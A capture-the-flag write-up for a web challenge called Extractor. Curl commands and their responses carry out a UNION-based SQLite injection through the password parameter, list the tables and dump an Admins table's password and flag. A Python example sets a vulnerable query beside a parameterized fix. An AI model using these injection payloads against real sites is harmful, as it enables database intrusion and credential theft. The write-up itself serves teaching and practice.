Extractor

1 Problem

Hints:
- Flag format :- shellctf{H3re_1s_tH3_fL4G}
- http://20.125.142.38:8956
- Alternate URL :- http://20.193.247.209:8555/
- More Alternate URL :- http://52.66.29.74:8999/

The site exposes two links: register and login.

curl 'http://20.125.142.38:8956/register?username=hu&pass=hu&content=hu' 

curl 'http://20.125.142.38:8956/login' # plain HTML page; clicking Login redirects to profile

curl 'http://20.125.142.38:8956/profile?username=hu&pass=hu&content=' 

2 exp

The profile page is injectable through the Password field (the pass parameter): 0' union select 1,2,3,4--. The database is SQLite.

hamilton@hamilton-Lenovo-G470:~/Downloads$ curl "http://52.66.29.74:8999/profile?username=hu&pass=0%27+union+select+1,2,3,4--&content=" | grep h3
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  3637  100  3637    0     0  12761      0 --:--:-- --:--:-- --:--:-- 12806
    <p> <h3> Here is what you left with us : </h3></p>
      <h3> Name : 2  </h3>
      <h3> Password : 3</h3>
      <h3> Signature : 4</h3>


hamilton@hamilton-Lenovo-G470:~/Downloads$ curl "http://52.66.29.74:8999/profile?username=hu&pass=0%27+union+select+1,2,3,name+from+sqlite_master--&content=" | grep h3
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  3642  100  3642    0     0  12472      0 --:--:-- --:--:-- --:--:-- 12472
    <p> <h3> Here is what you left with us : </h3></p>
      <h3> Name : 2  </h3>
      <h3> Password : 3</h3>
      <h3> Signature : Admins</h3>


curl "http://52.66.29.74:8999/profile?username=hu&pass=0%27+union+select+*+from+Admins--&content=" | grep h3
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  3686  100  3686    0     0   7431      0 --:--:-- --:--:-- --:--:--  7416
    <p> <h3> Here is what you left with us : </h3></p>
      <h3> Name : Adminnn  </h3>
      <h3> Password : H4rD_t0_Gue5s</h3>
      <h3> Signature : shellctf{Sql_1Nj3c7i0n_B45iC_XD}</h3>
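
Why the UNION payload above works, and the fix, as an added example that is not the challenge's own code: the schema, the sample rows and both function names are assumptions, built only from what the probes reveal (four columns, a table named Admins).

```python
import sqlite3

# Constructed schema and rows: the write-up only shows that the query returns
# four columns (UNION probe) and that a table named Admins exists.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Users  (id INTEGER, name TEXT, pass TEXT, content TEXT);
        CREATE TABLE Admins (id INTEGER, name TEXT, pass TEXT, content TEXT);
        INSERT INTO Users  VALUES (1, 'hu', 'hu', 'hu');
        INSERT INTO Admins VALUES (1, 'admin', 'constructed-secret', 'constructed-flag');
    """)
    return db

def profile_vulnerable(db, username, password):
    # Assumed "before" form: input is concatenated into the SQL text, so a
    # quote in `password` closes the literal and the remainder runs as SQL.
    sql = ("SELECT * FROM Users WHERE name = '" + username +
           "' AND pass = '" + password + "'")
    return db.execute(sql).fetchone()

def profile_hardened(db, username, password):
    # Bound parameters: values travel separately from the statement, so the
    # payload is compared as an ordinary string and matches no row.
    sql = "SELECT * FROM Users WHERE name = ? AND pass = ?"
    return db.execute(sql, (username, password)).fetchone()

# Payload from the write-up, URL-decoded ('+' is a space, %27 is a quote).
PAYLOAD = "0' union select * from Admins--"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", profile_vulnerable(db, "hu", PAYLOAD))  # Admins row leaks
    print("hardened:  ", profile_hardened(db, "hu", PAYLOAD))    # no match
    print("legit user:", profile_hardened(db, "hu", "hu"))       # normal login
```

The hardened query still serves the legitimate login; only the data/code boundary changes.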

Original challenge source: https://github.com/S-H-E-L-L/S.H.E.L.L-CTF-2022/tree/main/web/Extractor